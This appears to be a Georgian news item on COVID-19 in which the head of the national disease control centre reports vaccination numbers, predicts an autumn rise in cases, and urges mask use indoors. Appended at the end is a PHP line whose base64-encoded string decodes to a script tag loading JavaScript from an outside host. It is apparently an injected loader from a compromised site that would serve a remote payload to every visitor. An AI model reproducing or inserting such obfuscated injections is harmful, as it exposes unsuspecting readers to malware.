celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელის ამირან გამყრელიძის თქმით, საქართველოში ყველა საშუალება არსებობს, რათა თავიდან ავიცილოთ ფართომასშტაბიანი ეპიდემია და ის მოსახლეობას მოუწოდებს, რომ დახურულ სივრცეებში სასურველია, თვითდაცვისთვის პირბადე გამოიყენონ.
 
„ქვეყანაში მილიონ 200 000- ზე მეტი სრულად არის აცრილი, ხოლო 260 ათაზე მეტ ადამიანს პირველი ბუსტერი აქვს გაკეთებული.
 
შემოდგომაზე, სამწუხაროდ პროგნოზი არის რომ შემთხვევათა ზრდა იქნება, დიდი ალბათობით არ უნდა იყოს უფრო მეტი ფატალური შემთხვევები, როცა შემთხვევათა რაოდენობა იზრდება, რა თქმა უნდა, პროპორციულადაც, ამასთან საქმე გვქონდეს, დაცვის ერთადერთი საშუალება აცრაა.
 
ქვეყანას აქვს საკმაოდ ეფექტურად მოქმედი ახალი თაობის წამალი რომელიც ექიმის დანიშნულებით ეძლევა პაციენტებს დიაგნოზის დადასტურებიდან 72 საათში, იგი საკმაოდ კარგ შედეგს იძევა. ქვეყანაში ყველა საშუალება არსებობს, თვიდან ავიცილოთ ფართომასშტაბიანი ეპიდემია და მოვუწოდებ მოსახლეობას, რომ დახურულ სივრცეებში სადაც იკრიბებიან დიდი რაოდენობით ადამიანები, სასურველია, თვითდაცვისთვის გამოვიყენოთ პირბადე. პირბადეც არის მნიშვნელოვანი იარაღი პანდემიასთან ბრძოლის”,- განაცხადა ამირან გამყრელიძემ.
613
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");